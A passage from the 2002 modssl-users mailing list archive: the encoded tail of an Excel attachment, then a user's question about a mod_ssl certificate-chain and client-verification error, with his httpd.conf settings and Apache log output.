AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/v8AAAUAAgAAAAAA
AAAAAAAAAAAAAAAAAQAAAOCFn/L5T2gQq5EIACsns9kwAAAAtAAAAAgAAAABAAAASAAAAAQAAABQ
AAAACAAAAGAAAAASAAAAcAAAAAsAAACIAAAADAAAAJQAAAANAAAAoAAAABMAAACsAAAAAgAAAOQE
AAAeAAAABQAAAFVzZXIAAGYAHgAAAAUAAABVc2VyAABmAB4AAAAQAAAATWljcm9zb2Z0IEV4Y2Vs
AEAAAAAAxpGJAR3CAUAAAACAPBE6HvjBAUAAAAAAoqJyCB3CAQMAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP7/AAAFAAIAAAAAAAAAAAAAAAAA
AAAAAAEAAAAC1c3VnC4bEJOXCAArLPmuMAAAANgAAAAJAAAAAQAAAFAAAAAPAAAAWAAAABcAAABk
AAAACwAAAGwAAAAQAAAAdAAAABMAAAB8AAAAFgAAAIQAAAANAAAAjAAAAAwAAAC1AAAAAgAAAOQE
AAAeAAAABAAAAEFFUAADAAAA7Q4JAAsAAAAAAAAACwAAAAAAAAALAAAAAAAAAAsAAAAAAAAAHhAA
AAMAAAAHAAAAU2hlZXQxAAcAAABTaGVldDIABwAAAFNoZWV0MwAMEAAAAgAAAB4AAAALAAAAV29y
a3NoZWV0cwADAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAgAAAAMAAAAEAAAABQAAAAYAAAAHAAAA
CAAAAAkAAAAKAAAA/v///wwAAAANAAAADgAAAA8AAAAQAAAAEQAAABIAAAD+////FAAAABUAAAAW
AAAAFwAAABgAAAAZAAAAGgAAAP7////9/////v//////////////////////////////////////
////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////
/////////////////////////////////////1IAbwBvAHQAIABFAG4AdAByAHkAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAWAAUB//////////8CAAAAIAgCAAAA
AADAAAAAAAAARgAAAAAAAAAAAAAAAEAHCO0KHcIB/v///wAAAAAAAAAAVwBvAHIAawBiAG8AbwBr
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABIAAgH/////
//////////8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA7hQAAAAAAAAF
AFMAdQBtAG0AYQByAHkASQBuAGYAbwByAG0AYQB0AGkAbwBuAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAKAACAQEAAAADAAAA/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAsAAAAAEAAAAAAAAAUARABvAGMAdQBtAGUAbgB0AFMAdQBtAG0AYQByAHkASQBuAGYAbwByAG0A
YQB0AGkAbwBuAAAAAAAAAAAAAAA4AAIB////////////////AAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAEwAAAAAQAAAAAAAA

------_=_NextPart_001_01C2275C.E0BF4E82--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jul 10 11:06:03 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id LAA25996; Wed, 10 Jul 2002 11:05:09 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from unimur.um.es id LAA25760; Wed, 10 Jul 2002 11:04:24 +0200 (MET DST)
Received: from aries.dif.um.es (aries.dif.um.es [155.54.210.253])
	by unimur.um.es (8.9.1b+Sun/8.9.1) with ESMTP id LAA26834
	for ; Wed, 10 Jul 2002 11:04:23 +0200 (MEST)
Received: from dif.um.es (pirania.dif.um.es [155.54.210.33])
	by aries.dif.um.es (Postfix) with ESMTP id 1D90D14431
	for ; Wed, 10 Jul 2002 11:00:32 +0200 (MET DST)
Message-ID: <3D2BF6B9.3070901@dif.um.es>
Date: Wed, 10 Jul 2002 10:56:25 +0200
From: =?ISO-8859-1?Q?Gabriel_L=F3pez_Mill=E1n?= 
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.0.0) Gecko/20020529
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: SSLCertificateChain
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: =?ISO-8859-1?Q?Gabriel_L=F3pez_Mill=E1n?= 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users



Hi all.

    I have a problem with certificate chains in apache_1.3.19 with mod_ssl

    I have configure httpd.conf as follow:

**********************************************************
httpd.conf:
SSLCertificateFile /path/to/cert/server_certificate.pem
SSLCertificateKeyFile /path/to/cert/server_key.pem
SSLCACertificatePath /path/to/cert
SSLCertificateChainFile /path/to/cert/cas_certificates.p7c (PEM format)
SSLCACertificateFile /path/to/cert/subCA_certificate.pem
SSLVerifyClient optional

SSLVerifyDepth 3
***********************************************************

    cas_certificates.p7c is a certificate chain contains two CAs, subCA 
at index 0 and rootCA at index 1
    server_certificate.pem is signed by subCA
    subCA_certificate.pem contains the subCA certificate
    SSLCACertificatePath contains the cert directory with all 
certificates (I think it is optional)

    I can access througth a netscape browser because VerifyClient is 
optional.
    I want to access througth a Java servlet which want to retrieve the 
client certificate.
    When I try this I get the following exception:

 in /path/to/apache/logs/error.log:
[Wed Jul 10 10:59:58 2002] [error] mod_ssl: Certificate Verification: 
Error (19): self signed certificate in certificate chain
[Wed Jul 10 10:59:58 2002] [error] mod_ssl: SSL handshake failed (server 
bree.dif.um.es:443, client 155.54.95.12) (OpenSSL library error follows)
[Wed Jul 10 10:59:58 2002] [error] OpenSSL: error:140890B2:SSL 
routines:SSL3_GET_CLIENT_CERTIFICATE:no certificate returned

in /path/to/apache/logs/ssl_engine:
[10/Jul/2002 10:59:50 02548] [info]  Server: Apache/1.3.19, Interface: 
mod_ssl/2.8.3, Library: OpenSSL/0.9.6c
[10/Jul/2002 10:59:50 02548] [info]  Init: 1st startup round (still not 
detached)
[10/Jul/2002 10:59:50 02548] [info]  Init: Initializing OpenSSL library
[10/Jul/2002 10:59:50 02548] [info]  Init: Loading certificate & private 
key of SSL-aware server bree.dif.um.es:443
[10/Jul/2002 10:59:50 02548] [info]  Init: Seeding PRNG with 136 bytes 
of entropy
[10/Jul/2002 10:59:50 02548] [info]  Init: Generating temporary RSA 
private keys (512/1024 bits)
[10/Jul/2002 10:59:50 02548] [info]  Init: Configuring temporary DH 
parameters (512/1024 bits)
[10/Jul/2002 10:59:50 02549] [info]  Init: 2nd startup round (already 
detached)
[10/Jul/2002 10:59:50 02549] [info]  Init: Reinitializing OpenSSL library
[10/Jul/2002 10:59:50 02549] [info]  Init: Seeding PRNG with 136 bytes 
of entropy
[10/Jul/2002 10:59:50 02549] [info]  Init: Configuring temporary RSA 
private keys (512/1024 bits)
[10/Jul/2002 10:59:50 02549] [info]  Init: Configuring temporary DH 
parameters (512/1024 bits)
[10/Jul/2002 10:59:50 02549] [info]  Init: Initializing (virtual) 
servers for SSL
[10/Jul/2002 10:59:50 02549] [info]  Init: Configuring server 
bree.dif.um.es:443 for SSL protocol
[10/Jul/2002 10:59:58 02552] [info]  Connection to child 0 established 
(server bree.dif.um.es:443, client 155.54.95.12)
[10/Jul/2002 10:59:58 02552] [info]  Seeding PRNG with 1160 bytes of entropy
[10/Jul/2002 10:59:58 02552] [error] Certificate Verification: Error 
(19): self signed certificate in certificate chain
[10/Jul/2002 10:59:58 02552] [error] SSL handshake failed (server 
bree.dif.um.es:443, client 155.54.95.12) (OpenSSL library error follows)
[10/Jul/2002 10:59:58 02552] [error] OpenSSL: error:140890B2:SSL 
routines:SSL3_GET_CLIENT_CERTIFICATE:no certificate returned

    I think it's a problem of Apache ssl configuration but I'm not sure.

    Any idea?

    Thanks a lot, Gabi.

-- 
-------------------------------------------------
Gabriel Lopez Millan - Grupo ANTS-CIRCuS
Facultad de Informática
Universidad de Murcia (España) Tfo: +34 968367645


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

